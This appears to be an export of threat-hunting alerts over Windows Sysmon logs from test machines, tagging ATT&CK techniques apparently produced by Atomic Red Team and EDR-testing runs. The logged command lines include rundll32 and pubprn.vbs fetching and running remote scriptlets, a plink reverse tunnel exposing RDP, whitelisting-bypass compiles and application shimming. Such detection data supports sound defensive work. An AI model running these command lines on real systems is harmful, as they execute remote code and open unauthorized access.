C:\Users\IEUser\Desktop\plink.exe Release 0.70 Command-line SSH, Telnet, and Rlogin client PuTTY suite Simon Tatham plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test C:\Users\IEUser\Desktop\ PC01\IEUser 365ABB72-D6AB-5C67-0000-002056660200 0x26656 1 High SHA1=7806AD24F669CD8BB9EBE16F87E90173047F8EE4 365ABB72-D92A-5C67-0000-0010CB580900 3904 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"))",1," 1 5 4 1 0 0x8000000000000000 4971 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:10.619 747F3D96-6652-5D3F-0000-001058828C00 348 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-6652-5D3F-0000-0010B9708C00 5844 C:\Windows\System32\cmd.exe cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") )",1," 1 5 4 1 0 0x8000000000000000 4971 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:10.619 747F3D96-6652-5D3F-0000-001058828C00 348 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-6652-5D3F-0000-0010B9708C00 5844 C:\Windows\System32\cmd.exe cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") )",1," 1 5 4 1 0 0x8000000000000000 4971 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:10.619 747F3D96-6652-5D3F-0000-001058828C00 348 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-6652-5D3F-0000-0010B9708C00 5844 C:\Windows\System32\cmd.exe cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436050.388196,2019-07-30T01:34:10.388196+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") )",1," 1 5 4 1 0 0x8000000000000000 4969 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:10.292 747F3D96-6652-5D3F-0000-0010B9708C00 5844 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( rundll32 AllTheThings.dll,EntryPoint)",1," 1 5 4 1 0 0x8000000000000000 4968 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:05.526 747F3D96-664D-5D3F-0000-0010BB5D8C00 5572 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32 AllTheThings.dll,EntryPoint C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-664D-5D3F-0000-00108D5B8C00 912 C:\Windows\System32\rundll32.exe rundll32 AllTheThings.dll,EntryPoint ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1," 1 5 4 1 0 0x8000000000000000 4968 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:05.526 747F3D96-664D-5D3F-0000-0010BB5D8C00 5572 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32 AllTheThings.dll,EntryPoint C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-664D-5D3F-0000-00108D5B8C00 912 C:\Windows\System32\rundll32.exe rundll32 AllTheThings.dll,EntryPoint ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1," 1 5 4 1 0 0x8000000000000000 4968 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:05.526 747F3D96-664D-5D3F-0000-0010BB5D8C00 5572 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32 AllTheThings.dll,EntryPoint C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-664D-5D3F-0000-00108D5B8C00 912 C:\Windows\System32\rundll32.exe rundll32 AllTheThings.dll,EntryPoint ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 AllTheThings.dll,EntryPoint)",1," 1 5 4 1 0 0x8000000000000000 4967 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:05.475 747F3D96-664D-5D3F-0000-00108D5B8C00 912 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32 AllTheThings.dll,EntryPoint C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-664D-5D3F-0000-0010F1498C00 6836 C:\Windows\System32\cmd.exe cmd /c rundll32 AllTheThings.dll,EntryPoint ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1138] Application Shimming - process,1553028767.134377,2019-03-20T00:52:47.134377+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," 1 5 4 1 0 0x8000000000000000 1966449 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 20:52:47.054 365ABB72-569F-5C91-0000-001012610800 2548 C:\Windows\System32\sdbinst.exe 6.0.7600.16385 (win7_rtm.090713-1255) Application Compatibility Database Installer Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " C:\Windows\System32\ EXAMPLE\user01 365ABB72-5417-5C91-0000-002035340300 0x33435 1 High MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F 365ABB72-551C-5C91-0000-001030590500 2704 C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1," 1 5 4 1 0 0x8000000000000000 4967 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:05.475 747F3D96-664D-5D3F-0000-00108D5B8C00 912 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32 AllTheThings.dll,EntryPoint C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-664D-5D3F-0000-0010F1498C00 6836 C:\Windows\System32\cmd.exe cmd /c rundll32 AllTheThings.dll,EntryPoint ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1," 1 5 4 1 0 0x8000000000000000 4967 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:05.475 747F3D96-664D-5D3F-0000-00108D5B8C00 912 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32 AllTheThings.dll,EntryPoint C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-664D-5D3F-0000-0010F1498C00 6836 C:\Windows\System32\cmd.exe cmd /c rundll32 AllTheThings.dll,EntryPoint ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1138] Application Shimming - process,1553028746.364512,2019-03-20T00:52:26.364512+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," 1 5 4 1 0 0x8000000000000000 1966444 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 20:52:26.194 365ABB72-568A-5C91-0000-0010D24B0800 4072 C:\Windows\System32\sdbinst.exe 6.0.7600.16385 (win7_rtm.090713-1255) Application Compatibility Database Installer Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB " C:\Windows\System32\ EXAMPLE\user01 365ABB72-5417-5C91-0000-002035340300 0x33435 1 High MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F 365ABB72-551C-5C91-0000-001030590500 2704 C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [ T1059 ] wscript or cscript runing script,1564436085.660037,2019-07-30T01:34:45.660037+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct) in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 5006 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:34:45.524 747F3D96-6675-5D3F-0000-0010875C8F00 4036 C:\Windows\System32\cscript.exe 5.812.10240.16384 Microsoft ® Console Based Script Host Microsoft ® Windows Script Host Microsoft Corporation cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC 747F3D96-6675-5D3F-0000-0010AA498F00 4184 C:\Windows\System32\cmd.exe cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547556.069498,2019-07-19T18:45:56.069498+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "del T1121.dll" ),1," 1 5 4 1 0 0x8000000000000000 3615 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:45:56.002 747F3D96-D7A4-5D31-0000-0010C9C22900 6804 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "del T1121.dll" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547555.699293,2019-07-19T18:45:55.699293+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll" ),1," 1 5 4 1 0 0x8000000000000000 3613 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:45:55.672 747F3D96-D7A3-5D31-0000-001081B22900 5800 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1138] Application Shimming - process,1553028745.943907,2019-03-20T00:52:25.943907+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," 1 5 4 1 0 0x8000000000000000 1966429 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 20:52:25.853 365ABB72-5689-5C91-0000-0010543F0800 3896 C:\Windows\System32\sdbinst.exe 6.0.7600.16385 (win7_rtm.090713-1255) Application Compatibility Database Installer Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " C:\Windows\System32\ EXAMPLE\user01 365ABB72-5417-5C91-0000-002035340300 0x33435 1 High MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F 365ABB72-551C-5C91-0000-001030590500 2704 C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [ T0000 ] Suspicious process name detected,1563547555.621447,2019-07-19T18:45:55.621447+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs ) contain suspicious command ( \csc.exe),1," 1 5 4 1 0 0x8000000000000000 3611 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:45:55.057 747F3D96-D7A3-5D31-0000-0010F2A42900 4784 C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 4.7.3190.0 built by: NET472REL1LAST_C Visual C# Command Line Compiler Microsoft® .NET Framework Microsoft Corporation C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=ABAF24113034BBA4B4F4AC19D9097D36943D2E35,MD5=B87EE552626023951A7F03F2D31DA8A7,SHA256=D511363874B2A00D3DA5A20E6AE826334795A3A52AB5F8555C309D8068F5915B,IMPHASH=C4963CB3AF58DCFC863E42DD3B6FB80D 747F3D96-D7A3-5D31-0000-0010A0A22900 6748 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T0000 ] Suspicious process name detected,1563547555.105804,2019-07-19T18:45:55.105804+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" ) contain suspicious command ( \csc.exe),1," 1 5 4 1 0 0x8000000000000000 3610 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:45:55.023 747F3D96-D7A3-5D31-0000-0010A0A22900 6748 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547555.105804,2019-07-19T18:45:55.105804+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" ),1," 1 5 4 1 0 0x8000000000000000 3610 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:45:55.023 747F3D96-D7A3-5D31-0000-0010A0A22900 6748 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1138] Application Shimming - process,1553028585.172729,2019-03-20T00:49:45.172729+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," 1 5 4 1 0 0x8000000000000000 1966423 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 20:49:45.052 365ABB72-55E9-5C91-0000-00102EEB0700 2104 C:\Windows\System32\sdbinst.exe 6.0.7600.16385 (win7_rtm.090713-1255) Application Compatibility Database Installer Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB " C:\Windows\System32\ EXAMPLE\user01 365ABB72-5417-5C91-0000-002035340300 0x33435 1 High MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F 365ABB72-551C-5C91-0000-001030590500 2704 C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547519.48325,2019-07-19T18:45:19.483250+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3606 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:45:06.251 747F3D96-D772-5D31-0000-00107CF02800 324 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547506.213488,2019-07-19T18:45:06.213488+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f" ),1," 1 5 4 1 0 0x8000000000000000 3603 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:45:06.180 747F3D96-D772-5D31-0000-001031EB2800 6472 C:\Windows\System32\cmd.exe 10.0.17763.1 